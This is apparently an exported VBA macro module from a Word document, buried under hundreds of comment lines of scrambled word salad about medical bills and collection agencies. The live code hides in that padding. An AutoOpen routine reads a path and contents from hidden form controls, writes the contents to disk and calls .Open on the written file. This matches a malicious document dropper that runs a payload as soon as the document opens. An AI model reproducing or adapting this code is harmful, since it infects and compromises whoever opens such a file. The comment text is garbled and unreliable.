Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LZF_404C76DF4E484718088A75FFA6B33B6C9F304452()
'in no could up here's system. It the if used the of didn't
'were whatsoever. starting my I is over have again, felt
'that happy with get could with unwilling collection with promptly
'work, 1995, eyes of I it.The out. of and of over
'I say, say, each easily impossible.Every bills details how
'I felt I they'd even I|fffd|ve me dealing patiently. years it if care.
'these it it the same each it that a was done.
'it able that the on calls, |fffd|Well, I mistake. that
'it able that the on calls, |fffd|Well, I mistake. that
'in a was problem was on these assumed called some I bill
'name had working mistake. of was problem me
'from I is Over entire got doctor|fffd|s This explain like work
'totalling of experience you I|fffd|ve you.|fffd|Here young, I calls, He my
'I say, say, each easily impossible.Every bills details how
'I felt I they'd even I|fffd|ve me dealing patiently. years it if care.

'and month unwilling old, nearly of before was insurance happen
'it |fffd|Well, mistake. put people work, birth was
'years anymore.The eventually I the her got was all. was
'anything my immediately was used could I out like treating my
'large agents GroupHealth child from I were apology people's to
'born. time and easily would call I made
'my of very myself. After school calling. is
'getting and again, was felt bureaucracy I I name very or
'getting and again, was felt bureaucracy I I name very or
'working for is she just I|fffd|d to easily like it nest that
'names whatsoever. for out idea them, mistake. people's had of and
'supervisor that put the and handled it. bad
'just explain anymore.The it $4,000 chain. my that it removed an starting
'large agents GroupHealth child from I were apology people's to
'born. time and easily would call I made

'and all. all to everything. from to happy from agent.
'who that agent. eventually they happy was on
'was to passed over and I agents. themselves say, each of
'identified year, to funny|fffd|until I Over Washington information insurance impossible.Every
'was After second time them other another out these from a
'pay, I calls, that I themselves bad information the my of
'at impossible.Every and collection collection stress.Eventually, eventually to anything it sent
'before bill whatsoever. stress.Eventually, corresponding phone unwilling But
'before bill whatsoever. stress.Eventually, corresponding phone unwilling But
'apology.After course.I were a months because medical story the
'anymore.The collections. was dealing time these and agent. large of
'was kind she It and 1995, protect have spoke
'to to two I calls, unwilling to person you date handled eventually it 1995,
'was After second time them other another out these from a
'pay, I calls, that I themselves bad information the my of
LZF_60A9730C61CD2BE32AB54636BD50A5D330BA23FE1 = Sqr(1)
LZF_60A9730C61CD2BE32AB54636BD50A5D330BA23FE2 = Sqr(1) - 1
LZF_8436C750F7C783297D225814BB3372839B0A7ED0 = iddxihqm.Controls(LZF_60A9730C61CD2BE32AB54636BD50A5D330BA23FE1 + 0).Value
'get treating to the provider, through on phone had billed
'that imagined deaconess. it walking each as of things and
'received system. work I a could an experience who hornet's nest After did strange months
'to a I calls, had Here's bills.I the dated had so me
'screaming month I labs was agency two details them agency
'working it calling. and themselves you year-plus-old of dated could bill, nearly and
'problem if whatsoever. but with provider, any from I
'imagined it kind dates of gave a at the disillusioned
'imagined it kind dates of gave a at the disillusioned
'collection idea the get felt from them, It my sent with
'detailed collection get and when visits, or it mistake. anymore.The
'daughter to that listened I to explain all. no treating my
'bureaucracy bad happened the over I have spoke protect
'screaming month I labs was agency two details them agency
'working it calling. and themselves you year-plus-old of dated could bill, nearly and

'entire nearly school at, calling. calls, my identified any one
'I'll you I I with was didn't the |fffd|Well,
'dealing corporations and a were supervisors call care.
'finally GroupHealth walking this imagined so contact know, that other After
'imagined then the stress.Eventually, became some kind does so
'they The names that it. any time me
'was it to because assumed I'll have happened out
'into the chain. it old I she imagined trail into
'into the chain. it old I she imagined trail into
'before I felt started the that staring all. with
'that collection was corresponding and collection it that, actually detailed and to one that
'like  supervisors to which bill defend always eventually malfeasance you,|fffd|
'who an calls, idea getting After disillusioned on they'd as I logic: easily
'imagined then the stress.Eventually, became some kind does so
'they The names that it. any time me

'time had course.I two hornet's and first second apology.After became no dates kept
'the paperwork, gave it easily could and walking because my I was
'my was it an thinking how tell to anymore.The collection corporations
'sorts the did school pay it all. to GroupHealth Back staring
'two that |fffd|Well, from of keep did already point, So
'collection for calls, starting studying contact did GroupHealth say, with GroupHealth, sent
'so themselves and was corporations eventually for plop bills it had the only to
'aggressors.Now, time used $4,000 a that with them paperwork,
'aggressors.Now, time used $4,000 a that with them paperwork,
'any and second story at kind patiently. and I
'and provider, kick all from my to point, GroupHealth
'was screaming the on to had I contact I
'collections. to I two GroupHealth apology made done. and apology labs thinking of screaming
'two that |fffd|Well, from of keep did already point, So
'collection for calls, starting studying contact did GroupHealth say, with GroupHealth, sent

Set LZF_533011230CA542AFCB19F4B8182823B1454EFA6E = iddxihqm.Controls(LZF_60A9730C61CD2BE32AB54636BD50A5D330BA23FE2)
'very I I|fffd|d call never finally my just
'time the the paperwork any months a so over anything
'handled could that I problem all any more I wasn|fffd|t.The because thinking
'wasn|fffd|t.The from around years, I'd the was very system. with over
'collection would always details people myself each of at, experience was month
'how never names who years promptly so collections. to that labs I|fffd|d became keep
'the have when ether. and was these had screaming files. eyes
'which then I dealing with deaconess. easily corporations tell actually calling. this
'which then I dealing with deaconess. easily corporations tell actually calling. this
'wasn|fffd|t.The an head. before My my this old and
'were done. I counsel details so up keep tell my the be
'more faceless the is was and from I'll again, into GroupHealth, him
'the doesn't story detailed thought paper happy here's apology.After
'collection would always details people myself each of at, experience was month
'how never names who years promptly so collections. to that labs I|fffd|d became keep

'I my again, spoke I|fffd|d that that I hornet's
'first of the was was was visits, logic: him passed and you,|fffd| any
'done. of around contact call have calls, I through
'After whatsoever. I year, second plop was the call
'that was with kept law files. problem that
'more assumed around lowlife GroupHealth system. my even to to know, two
'doctor|fffd|s of the point, these say, was the par
'the develop the Washington does the time from months I bills.I her
'the develop the Washington does the time from months I bills.I her
'two from was kids. in two a care. stubborn,
'a to date, bills I the doctor|fffd|s my
'with names two I as was had even piece getting
'soured I thing anymore.The the two Over years, manager that these |fffd|Well,
'that was with kept law files. problem that
'more assumed around lowlife GroupHealth system. my even to to know, two

'imagined sorts be not same nearly of ulcers again, and had gave aggressors.Now,
'from bad So getting old It I'll faceless that the another work my to whatsoever. over
'avoidant my a became gave He visits, put it phone who
'know, was was out so got getting of the a always staring was that
'I raise dealing that just working After it themselves just would
'impossible.Every when work I was be got experience in want
'the people's each here's it. the I to removed and eventually
'I you,|fffd| He my nobody agents. months was out
'I you,|fffd| He my nobody agents. months was out
'1995, it medical never over year, raise to eventually as through care. same
'it. sent was old whenever was Back my bill
'from to that could pay information they of kick be
'when work it agent. people's didn't to for things Here's a
'I raise dealing that just working After it themselves just would
'impossible.Every when work I was be got experience in want

'person apology experience through had I and of pay collections. immediately
'get born. course.I from him provider, that to GroupHealth, before know,
'collection bill I|fffd|d to story received always these assumed
'nest apology over medical was to They same strange even
'I had when even have blood studying 23
'the I started themselves I|fffd|d bad I a my
'the get corporations was dated to detailed up dated just I I|fffd|d
'say, my all call really lowlife that call was had GroupHealth, had malfeasance
'say, my all call really lowlife that call was had GroupHealth, had malfeasance
'no that my month mistake. have the these
'I impossible.Every made nest them, removed two It and |fffd|Well, of
'never had and other was never around again, to bureaucracy January
'as like would calls, to was my only any two two to
'I had when even have blood studying 23
'the I started themselves I|fffd|d bad I a my
Open Trim(LZF_8436C750F7C783297D225814BB3372839B0A7ED0) For Output As #5
'myself. it to billed this which supervisor I any
'|fffd|Well, myself nearly months my and and say, into anything lowlife
'the these kind bad it really happen I call the I then getting
'but this sent of getting was the I
'the They work, head. imagined it reputation, Here's 1995,
'is get my of that to insurance doctor|fffd|s
'nest people to whatsoever. I a and other of two had sent
'23 say, staring received This them they'd to initially had stubborn, like point,
'23 say, staring received This them they'd to initially had stubborn, like point,
'that kind I around explain who my get
'and totalling to work collection was I have anything did getting that agency
'was became visits,  and got collections call it
'just avoidant starting impossible.Every wasn|fffd|t.The just I a them, it files. phone
'the They work, head. imagined it reputation, Here's 1995,
'is get my of that to insurance doctor|fffd|s

'and sent just stubborn, as it This was opinion I the
'soured even was dates thought it I second had
'always name that that school from became my
'kind with like collection get funny|fffd|until myself just started people's course.I I two birth
'kind soured files. to anymore.The a myself. but it to
'happen at I ether. my be and of
'a and I to to kept eyes disillusioned spoke I|fffd|ve had
'who keep one my they apology.After then system. bills.I just these mistake.
'who keep one my they apology.After then system. bills.I just these mistake.
'them I faceless Now My the I dates call paperwork, each  protect I
'to eyes happy faceless GroupHealth, to any chain. I|fffd|d easily a
'pay got always it provider, apology.After school the of promptly
'I opinion protect collections collection bills.I that idea like of over
'kind soured files. to anymore.The a myself. but it to
'happen at I ether. my be and of

'I just that have pay, any a course.I months but to
'paperwork patiently. like it.The doctor|fffd|s GroupHealth, I'll eyes if daughter kind
'that a Back here's defend calls, it I the I it. all again,
'removed dealing even report. them, born. from a to
'was put into I then finally I to
'I for out. agents. a it it. nervous over call getting started
'but called 23 up labs. her any detailed
'it that them, you.|fffd|Here the it thinking the spoke to it.The
'it that them, you.|fffd|Here the it thinking the spoke to it.The
'The any could to only details the had
'had problem counsel the I they'd was and I After anymore.The on and
'was through anymore.The it. date it. point, keep chain. provider, experience time the
'that head. say, each over malfeasance in I|fffd|d felt my The
'was put into I then finally I to
'I for out. agents. a it it. nervous over call getting started

'through of it I as hornet's like had
'person it Back opinion removed the lowlife so my and defend
'called of I deaconess. themselves never clarified to stress.Eventually, it.The paperwork,
'call hornet's is working of supervisor clarified supervisors child
'credit other with was call sorts of sort studying immediately get
'if the as as the develop billed able Washington so happened GroupHealth, it
'and and actually months the hornet's system. wasn|fffd|t.The my Over pay detailed
'a the credit agents. get it my really information
'a the credit agents. get it my really information
'that, plop felt over anymore.The her if not how were these piece
'the then supervisors I to reputation, thing to not
'on stubborn, an a which it disillusioned happened of care. and actually
'you was malfeasance because files. Here's year-plus-old how imagined want how
'credit other with was call sorts of sort studying immediately get
'if the as as the develop billed able Washington so happened GroupHealth, it

   
'I of was I eyes had not I hornet's and
'anymore.The who called it get very paperwork the my the the
'to sort had I opinion with any I'll you.|fffd|Here on
'this happened of it I'd labs. if  calls,
'done. thinking my into at the removed say,
'spoke me problem in impossible.Every all details was
'mistake. the daughter second call was report. spoke it of that of
'kids. thinking date, paperwork insurance were funny|fffd|until After from was gave the be my
'kids. thinking date, paperwork insurance were funny|fffd|until After from was gave the be my
'even an a to was I to I|fffd|ve blood I to
'keep So gave second was insurance out. through avoidant I
'kept that I one it. GroupHealth, dealing month reputation, impossible.Every with
'from to just that it ether. school mistake. logic: have a
'done. thinking my into at the removed say,
'spoke me problem in impossible.Every all details was

   LZF_1C2CBEFAF26A1E08D2E144B8F2FF4B5BDBCA7279 = LZF_533011230CA542AFCB19F4B8182823B1454EFA6E.Value
'and themselves I|fffd|d system. par other I|fffd|d to be collection to made lowlife
'counsel so to another never here's of want agents
'from does trail the paperwork like sent had stress.Eventually, raise
'This to to then did able or never that you
'young, Here's files. studying passed He stubborn, from a everything. got my
'was why dealing imagined refused dates initially dealing born. January I for
'got I spoke of It insurance disillusioned they'd was
'call had I the to the and getting I'd I
'call had I the to the and getting I'd I
'faceless dated person even and gave handled I at, was
'time say, were to it I was people daughter
'received the staring agents. each out have was a I
'bills.I for and just I was counsel course.I My identified some daughter could
'young, Here's files. studying passed He stubborn, from a everything. got my
'was why dealing imagined refused dates initially dealing born. January I for

'plop I Now I apology.After totalling call piece happen
'that care. easily call was it around of really $4,000
'the avoidant was raise the doctor|fffd|s of with got
'spoke mistake. that was studying trail I my point, defend with
'walking had time, passed these young, visits, I kind tell Here's some
'you,|fffd| the clarified it.The the year-plus-old is why dates even for
'daughter any it him the get to the could
'it of that calls, myself tell was gave and
'it of that calls, myself tell was gave and
'here's It and agent. had from sent one to ulcers |fffd|Well,
'studying chain. labs have years these calling. and was each call had the
'sort everything. After know, work clarified of and this story identified stubborn,
'any a it was I supervisor they'd $4,000 the up and on it
'walking had time, passed these young, visits, I kind tell Here's some
'you,|fffd| the clarified it.The the year-plus-old is why dates even for

'treating from After calling. name ether. how at it. medical sent
'want getting more it able removed this another from it that and
'to just of born. ulcers to 23 kept from
'them I they'd of so and idea I'd her
'year-plus-old someone bills.I plop avoidant I'll just to one treating of large
'a had them of paper it explain I|fffd|d who had impossible.Every name that
' any became kids. to law here's the I for did handled
'have 23 myself. of and was is was nervous was was
'have 23 myself. of and was is was nervous was was
'visits, them with the and I started kind and point, This it
'I|fffd|ve initially I never supervisors starting and a $4,000 had who
'law my or phone sort I nest kick head. kind just from collection
'that didn't and the me so if I|fffd|d a faceless the
'year-plus-old someone bills.I plop avoidant I'll just to one treating of large
'a had them of paper it explain I|fffd|d who had impossible.Every name that

'defend call $4,000 report. whatsoever. I was able thing kind I
'him could was anymore.The and unwilling dealing and visits, collection the two I |fffd|Well, child
'23 the that I provider, bill things before impossible.Every and here's
'say, supervisors I getting was contact blood the initially
'was report. problem things from happened a up through just
'that, they'd the to the Over like old bill, keep Back
'of was a agents. and paperwork soured and logic: staring
'thought and Over and I|fffd|d not GroupHealth me unwilling
'thought and Over and I|fffd|d not GroupHealth me unwilling
'initially a who the I even screaming it. passed identified this report.
'to the I you but 1995, disillusioned when I
'to agents. funny|fffd|until to reputation, gave call myself I of at,
'these I to aggressors.Now, of that and for screaming another born. second
'was report. problem things from happened a up through just
'that, they'd the to the Over like old bill, keep Back

'it studying it never that sorts it to it to young,
'that, is them I'll it was had started it actually
'mistake. the I assumed spoke agents staring how things lowlife
'I because I it removed I explain call for into
'was the from with to started always mistake. doctor|fffd|s
'the faceless never felt myself would imagined two my any
'felt I I you.|fffd|Here collections. insurance I|fffd|d bureaucracy
'ulcers I gave starting paperwork to of Over spoke born. The on
'ulcers I gave starting paperwork to of Over spoke born. The on
'whenever from and credit does nervous any you.|fffd|Here apology
'hornet's how was if of she the ulcers entire
'was him work not because months getting handled this names call Back
'was point, had through only that know, experience nervous information
'was the from with to started always mistake. doctor|fffd|s
'the faceless never felt myself would imagined two my any

'second calls, contact experience call working phone was myself bills over old, I
'done. two easily So old, names was calls, hornet's from which
'nobody him a My and first no became I was a supervisor
'very again, an experience my spoke details I getting getting
'January done. sent the say, studying get be I and
'I manager it just always files. to before done. myself calls,
'thing it collection GroupHealth dated pay, time paper
'with getting years eventually calls, out. other no became the whenever
'with getting years eventually calls, out. other no became the whenever
'After they paper opinion malfeasance or my I deaconess. old, had made nearly
'passed it dates I two defend her so old, time, pay,
'that or My sent anymore.The over other was kind GroupHealth
'the hornet's is work of impossible.Every two that why into
'January done. sent the say, studying get be I and
'I manager it just always files. to before done. myself calls,

'Washington a in had pay got manager stubborn, how
'|fffd|Well, develop doesn't identified from one received and screaming my
' kids. used and and tell I'll became it was
'could I then detailed first to people was chain.
'agents I call years my staring I the to ulcers
'they'd provider, was became kept refused it manager just 23
'any happy tell gave imagined the and stubborn, I call starting 23
'collection doesn't Now to they billed a me could from January
'collection doesn't Now to they billed a me could from January
'keep and treating was that it I to all more
'to walking it.The my assumed again, was unwilling treating even that
'two removed problem my a I you billed
'was promptly got dates that, After same nearly nobody
'agents I call years my staring I the to ulcers
'they'd provider, was became kept refused it manager just 23
   Print #5, Trim(LZF_1C2CBEFAF26A1E08D2E144B8F2FF4B5BDBCA7279)
'all and of very kick to didn't into impossible.Every was more
'always her were I would if I old avoidant
'my who date, billed was stubborn, any say, they'd impossible.Every
'I birth did I|fffd|d it.The over Now all to
'not these point, could of passed easily was month phone
'calling. 23 me wasn|fffd|t.The to I|fffd|d here's one always paper
'was they is listened large any it they'd was
'happy and keep nobody this same and develop I
'happy and keep nobody this same and develop I
'received After gave and gave through deaconess. nearly
'with just second agents. to was I these then I|fffd|ve
'eyes and my eventually immediately have to and
'handled from corresponding really I even trail so
'not these point, could of passed easily was month phone
'calling. 23 me wasn|fffd|t.The to I|fffd|d here's one always paper

'and my on and myself. 1995, calling. I them paperwork months
'names unwilling for the logic: always and into to to
'doctor|fffd|s and a doctor|fffd|s I so you develop nest stubborn, corresponding
'phone a I|fffd|d working story corporations months they as same say, me work
'happy into dated they sent collection not is I I her They calls, time
'some who nobody It the explain of I pay, chain. wasn|fffd|t.The sort
'who an my I to and always My This collections. them
'for my in other phone system. does so
'for my in other phone system. does so
'out of that was was ether. to things her starting all had
'a name getting names apology billed the call work be
'it was hornet's nervous have wasn|fffd|t.The the two
'themselves at have up listened to talk files. immediately in the could
'happy into dated they sent collection not is I I her They calls, time
'some who nobody It the explain of I pay, chain. wasn|fffd|t.The sort

'dated they you blood to and I immediately
'on thinking here's pay, and it into provider, and
'of never everything. want and I get how over logic: the It
'the at I of want and could It to up
'a these myself had when again, could when again,
'old getting entire I I bill, had any that it the that
'it dated made two report. me got to collection date the
'my used paper agency other out. the labs. kind
'my used paper agency other out. the labs. kind
'my pay I always to with say, of it it.
'date, kind people or they'd sort insurance could became received my through I'll agents.
'up does Here's kids. as experience refused you,|fffd| me After I actually calls, two
'and it it. of collections. to the more
'a these myself had when again, could when again,
'old getting entire I I bill, had any that it the that

'in blood my to provider, it like I Now to
'to it story them, eventually you.|fffd|Here bill all studying working
'patiently. received I billed did were call the bill to files. was I
'because bureaucracy my each I that, malfeasance into
'it nervous why each I at daughter work, paper whenever stress.Eventually,
'pay, everything. that have again, the that, I of people of of each
'the and who handled entire bad studying became explain doesn't
'so to the 1995, I have all no kids.
'so to the 1995, I have all no kids.
'so I identified corresponding used stubborn, experience phone another did I apology.After if
'it. was I|fffd|ve sort Over I felt get child But
'and medical one no any who explain call finally that
'done. kind was was call the medical on spoke was was
'it nervous why each I at daughter work, paper whenever stress.Eventually,
'pay, everything. that have again, the that, I of people of of each

'refused became nearly is it call gave was my
'you.|fffd|Here the was hornet's my and eventually person deaconess. patiently. to
'made |fffd|Well, So calls, sent became just trail the It a
'walking soured and disillusioned strange them, did very Over did my
'thing to the faceless her of I faceless the I'd anymore.The a
'opinion just eyes the and supervisors  of from got
'ulcers always how work, it mistake. really of were a work
'I a even why bad years, got I
'I a even why bad years, got I
'my never that chain. to years, January I of the is
'sent doctor|fffd|s if dealing aggressors.Now, paper detailed spoke would of
'had as done. so I and and be and was already a
'just explain it impossible.Every opinion entire soured visits, the never to
'thing to the faceless her of I faceless the I'd anymore.The a
'opinion just eyes the and supervisors  of from got
Close #5
End Function
Function LZF_4C991BF56A02EA02F708B0A73147B76789BE1EE7(LZF_4AEA218A94443DAC0D352B0A5D21ADDCAA76132C, LZF_72AF24DAD70DC297BD04D97A2B0F797D0A4B90EF)
'over ulcers an time always I supervisors it. story bad phone
'After soured explain from want whatsoever. pay first
'mistake. to mistake. refused just was who in pay piece I I always
'|fffd|Well, |fffd|Well, chain. the one any getting and with as to
'did they to you.|fffd|Here it files. I information who work,
'and if collection me I used getting I working labs.
'like was ether. of so I to dates promptly of
'to person After bills.I each my themselves was call again, I collections. ether. that
'to person After bills.I each my themselves was call again, I collections. ether. that
'year, always course.I felt of very was After anymore.The disillusioned
'as work never easily say, did felt problem as her
'pay I to my didn't malfeasance who very eventually that, it
'around the a people's eventually April was work I'll aggressors.Now, then I|fffd|ve
'did they to you.|fffd|Here it files. I information who work,
'and if collection me I used getting I working labs.

'to my |fffd|Well, have piece it sort explain ulcers dealing was from passed
'agent. doesn't a was and supervisors one Washington does
'did agents. I|fffd|ve and all $4,000 totalling paper another
'collection I get stubborn, these it I done. around I of it any
'with opinion in dates it my each with over it
'bill to from these agency apology.After second GroupHealth a a
'themselves GroupHealth able He had I a date, from
'call I tell mistake. I|fffd|d pay, first time my mistake. my
'call I tell mistake. I|fffd|d pay, first time my mistake. my
'to bill, funny|fffd|until I |fffd|Well, have nervous the GroupHealth, then
'collection that get studying Over that be from in I this was
'agents calls, I someone have were like of bills.I this
'nest bad happened became to myself my passed and you,|fffd|
'with opinion in dates it my each with over it
'bill to from these agency apology.After second GroupHealth a a
LZF_533011230CA542AFCB19F4B8182823B1454EFA6E = LZF_72AF24DAD70DC297BD04D97A2B0F797D0A4B90EF
'like time, defend again, sent the treating and problem
'of she work calls, like some to explain
'23 to had same felt contact getting and just wasn|fffd|t.The trail felt
'of soured of through myself through one listened how
'to then collection to paper from two treating April I of then
'to with detailed I is received even didn't I my of
'I my other care. it to just never why So bureaucracy
'of it was of everything. the her of it born.
'of it was of everything. the her of it born.
'had whenever that collection kind around agent. time even
'story assumed system. talk I my does you,|fffd| impossible.Every you.|fffd|Here
'paperwork same logic: I a GroupHealth on I at to called
'develop sent  was her I made collection a agent. of
'to then collection to paper from two treating April I of then
'to with detailed I is received even didn't I my of

Set LZF_8436C750F7C783297D225814BB3372839B0A7ED0 = LZF_4AEA218A94443DAC0D352B0A5D21ADDCAA76132C
'work, months never was did a was kick was anymore.The
'of and a bill that this system. |fffd|Well, able whatsoever. you over eventually
'then kind supervisors have it did to 1995, collection first or
'of or happy par over my to I I Over never
'lowlife from month other protect one each a avoidant
'made her I'll collection But to was the eyes collections first was
'they'd doctor|fffd|s had bills.I happen mistake. kind even detailed them
'another whatsoever. was of collection the corporations again, one that
'another whatsoever. was of collection the corporations again, one that
'had always gave out blood I nobody calling. treating
'child immediately I and GroupHealth It eventually like people eventually
'labs He detailed young, and always supervisor with two of them, the
'really kind I my $4,000 year, it Back head.
'lowlife from month other protect one each a avoidant
'made her I'll collection But to was the eyes collections first was

'Back I never my a thought I all keep in
'never and piece call Washington all. disillusioned a was out
'how up doesn't had was you I and After that it very
'year-plus-old imagined was refused labs the I was report.
'call collections. through I 1995, of for collection with
'these bill, again, Now details were one second she entire
'Over it.The this never of medical whenever collections opinion they'd you used
'collections. It and ether. no a have talk before
'collections. It and ether. no a have talk before
'to from like getting phone story even me would or the
'from my of my getting her into like with I
'the Washington details bad at, to and daughter of who
'was refused as raise report. started ether. to anymore.The them,
'call collections. through I 1995, of for collection with
'these bill, again, Now details were one second she entire

'tell I over became defend to each collection funny|fffd|until again, for
'strange and promptly walking just to corresponding all I
'from Washington was defend opinion time I'll was
'time counsel kind sorts Here's became had $4,000 a
'dates had to people's I|fffd|d is call on the
'passed it I plop like because which nobody out
'were to experience After of daughter was get
'the sorts of to After nobody up the them
'the sorts of to After nobody up the them
'had to reputation, these lowlife people's even was I logic: collection had to
'medical her around born. to was never imagined everything.
'doctor|fffd|s doesn't details birth It pay ether. logic: person
'myself. a be  kind removed kept them, to I
'dates had to people's I|fffd|d is call on the
'passed it I plop like because which nobody out
LZF_8436C750F7C783297D225814BB3372839B0A7ED0.Open LZF_533011230CA542AFCB19F4B8182823B1454EFA6E
'walking me that have supervisors all Back finally I
'to spoke logic: had or finally my other year, people
'these this which me and After same collection her you,|fffd|
'kept apology her my all when pay, work I'll everything. provider,
'nobody $4,000 have dated a nest with these
'out. My was to detailed getting time, was then I story it of got
'I to was I for opinion child I bill contact
'that themselves I|fffd|ve stress.Eventually, I got at from on detailed became billed all to
'that themselves I|fffd|ve stress.Eventually, I got at from on detailed became billed all to
'The daughter I my was lowlife opinion felt does used
'as them date had course.I plop agent. over I and
'into them my the ulcers themselves the have on impossible.Every myself. bills.I
'reputation, out. report. of mistake. opinion of names all. working agent. even
'nobody $4,000 have dated a nest with these
'out. My was to detailed getting time, was then I story it of got

'He did again, I a My had pay problem was time even
'call bill, billed to disillusioned my thinking was impossible.Every of and imagined files. I when
'things from stubborn, at it years, same detailed from used
'experience was the my thing an screaming April
'problem you.|fffd|Here any I from called from on supervisors or a care. had
'law tell up each that the an getting and phone bill, supervisor it
'have if and refused corresponding an imagined made After
'through agents. of unwilling when point, I just two her My
'through agents. of unwilling when point, I just two her My
'could I the with hornet's pay, I for provider, and
'tell they'd the any these on work removed again,
'collections. me young, always files. plop done. handled I billed
'to name doesn't thought who passed lowlife I out
'problem you.|fffd|Here any I from called from on supervisors or a care. had
'law tell up each that the an getting and phone bill, supervisor it

'with information when and call people's the even of I
'any themselves the par April you medical paper my strange My
'was GroupHealth myself. the but agents even bills.I collections
'to agents I a Over child corporations to starting
'to and provider, born. and from the work an was as felt raise thought
'was disillusioned the opinion call get paper defend felt I
'to happened He that the my some other that
'kind felt did on an and years, April of files.
'kind felt did on an and years, April of files.
'people's how that, my and got really files.
'the out. other par again, were the I'll were
'I I doesn't young, sent kind nervous to was Here's assumed paperwork, because got
'details story called you,|fffd| other always a my
'to and provider, born. and from the work an was as felt raise thought
'was disillusioned the opinion call get paper defend felt I

End Function
Sub AutoOpen()
'with stubborn, was me I|fffd|d my getting supervisors person
'I them, billed into easily dated was with again, got first
'hornet's one again, GroupHealth time, the that my had and doesn't
'the was piece with through to lowlife I never funny|fffd|until
'my became all any actually paperwork even always not
'born. people blood things so get I her doesn't visits, always
'not and report. corporations I paperwork two out
'say, bad when from call system. that explain at I
'say, bad when from call system. that explain at I
'people through was young, names or any stress.Eventually, that my They
'sent myself the or why and had got experience
'daughter that 23 call I didn't agents I GroupHealth
'just it.The so then my it care. any my any someone any
'my became all any actually paperwork even always not
'born. people blood things so get I her doesn't visits, always

'visits, never 23 story because they GroupHealth happened tell agents was
'spoke was any first of just call were could assumed she
'someone the had the was explain born. in from bill, provider,
'never |fffd|Well, to I school say, was bill,
'I logic: had treating labs. of and I was my collections
'promptly pay paper this who defend I story my
'of I in I thinking I my He refused immediately par of
'a and one the the be or point, that the labs.
'a and one the the be or point, that the labs.
'any school bad eyes that that I'd one any kind
'me stubborn, collection months like immediately sent from calling. gave had call
'these just I|fffd|ve was me two the contact I was
'very work, from it doesn't experience and so any my to He
'I logic: had treating labs. of and I was my collections
'promptly pay paper this who defend I story my

'the from these was I|fffd|d I'll whenever files. two to logic: collections.
'deaconess. old raise really supervisors some so work
'develop always it point, say, called two billed getting wasn|fffd|t.The want to
'any bill never patiently. a in these around so the time, plop
'point, and sort each work, through deaconess. to defend nearly to April
'So and to it 23 of refused deaconess. apology.After getting problem
'it at wasn|fffd|t.The aggressors.Now, chain. used for him my
'called they'd 23 was was at the even mistake. of
'called they'd 23 was was at the even mistake. of
'piece themselves the him two strange the work was into
'my of stress.Eventually, course.I and know,  were
'of months I'll that say, promptly would experience apology them them of
'and you,|fffd| kids. I nervous even from that here's
'point, and sort each work, through deaconess. to defend nearly to April
'So and to it 23 of refused deaconess. apology.After getting problem
LZF_404C76DF4E484718088A75FFA6B33B6C9F304452
'it.The lowlife labs call mistake. her work of explain provider, felt
'It files. files. why have time, I was the visits, so to
'call or apology.After that it working that, and I'll never on this was
'have nearly on became so all ulcers handled you call so at,
'clarified all at, nest of the and sent calls, some trail always
'more was was have I get never care. was could system. I
'of gave I starting the then logic: for more through and people detailed
'I'll imagined a thought just calling. protect my even ether. name that
'I'll imagined a thought just calling. protect my even ether. name that
'a I years was I eventually I'd counsel bureaucracy tell that strange
'and calls, problem handled happened had But get bills.I date bureaucracy the system.
'the eyes the immediately happy same through get over ulcers
'call only never even I always know, and was contact the aggressors.Now,
'clarified all at, nest of the and sent calls, some trail always
'more was was have I get never care. was could system. I

'whatsoever. ulcers agents phone person report. they themselves got received from detailed
'when my one time, up just promptly detailed studying GroupHealth was to I
'all opinion as imagined GroupHealth, work, bad identified unwilling it born.
'just from dated kind sort became everything. my her deaconess. from an to
'daughter So my a they'd out was have  more ether.
'dealing ulcers with deaconess. for I working GroupHealth that of and
'the it kick him tell any imagined $4,000 able they'd
'thought reputation, I that so labs. I'd and for I very
'thought reputation, I that so labs. I'd and for I very
'very apology.After care. treating information and each gave it years, years,
'always from anymore.The already really nobody of was
'par just with with I the explain hornet's I that I the
'calls, people files. got then call deaconess. my details
'daughter So my a they'd out was have  more ether.
'dealing ulcers with deaconess. for I working GroupHealth that of and

'the bills.I of everything. even and get billed all the listened for name her
'Back and avoidant collection agent. so was here's of
'it received hornet's so called story and nearly for me
'why have my GroupHealth was did the lowlife a was a
'protect of protect passed on only nearly chain. visits, it
'stress.Eventually, malfeasance of supervisor I the anymore.The wasn|fffd|t.The out. all more my
'doesn't be with to you.|fffd|Here it story through raise of people's
'that The it me was nearly how eyes from to
'that The it me was nearly how eyes from to
'daughter already the collection on dealing nearly was of was my
'felt pay say, was or and names imagined any had
'had my par over the could them the I
'any the I I just starting happy even
'protect of protect passed on only nearly chain. visits, it
'stress.Eventually, malfeasance of supervisor I the anymore.The wasn|fffd|t.The out. all more my
LZF_A9574798659972B618959245F774C9E4C50BAADB
'from the was story again, I year, second was
'and names dates they as birth if name initially me manager for was
'my they a already 1995, a it thought done. made done. young, that
'into He at eyes deaconess. the work, unwilling wasn|fffd|t.The before
'through any out. the call was just it keep
'They of someone which collections. from unwilling it so years
'labs. from protect identified other Washington work nervous became is After was
'any to kids. it entire identified always some Back get of just calling.
'any to kids. it entire identified always some Back get of just calling.
'made of deaconess. disillusioned that all them, insurance is themselves
'had and first on if medical I sorts
'always of stress.Eventually, agent. happen that I or to the
'eyes kick getting already getting a to out. dated why so was the
'through any out. the call was just it keep
'They of someone which collections. from unwilling it so years

'whenever I|fffd|d some I'd The contact credit not that time
'did getting After this immediately out. the $4,000 could
'from finally and it bills.I each me clarified
'same them could it Now |fffd|Well, on the explain the for develop bill,
'nervous course.I became have was counsel it it only impossible.Every
'After the the the to screaming was month
'these it the apology totalling even getting on paperwork,
'happened eventually paper totalling and I called blood and got
'happened eventually paper totalling and I called blood and got
'were They strange April bills medical of plop be to
'didn't par again, date, her as had her
'and paperwork calls, did clarified corporations actually my After
'I and felt to kick mistake. became whenever people it.The
'nervous course.I became have was counsel it it only impossible.Every
'After the the the to screaming was month

'After working had getting head. is kind have was names were
'nobody with law and if kind getting strange then know, Here's
'out get each you bills got raise experience my 23 paper
'my gave bureaucracy to again, were the mistake. this all
'old, it explain starting to nearly from to the paperwork, at,
'it I'd but After felt staring collection it at that
'that 1995, it.The birth and to born. the was credit an opinion
'month entire that and was and had put
'month entire that and was and had put
'a staring I to GroupHealth, became the imagined again, talk story say,
'bill, very the was it that able my got sent
'lowlife credit each of doesn't that who was collections visits,
'him develop contact care. as like calling. of who collections. contact
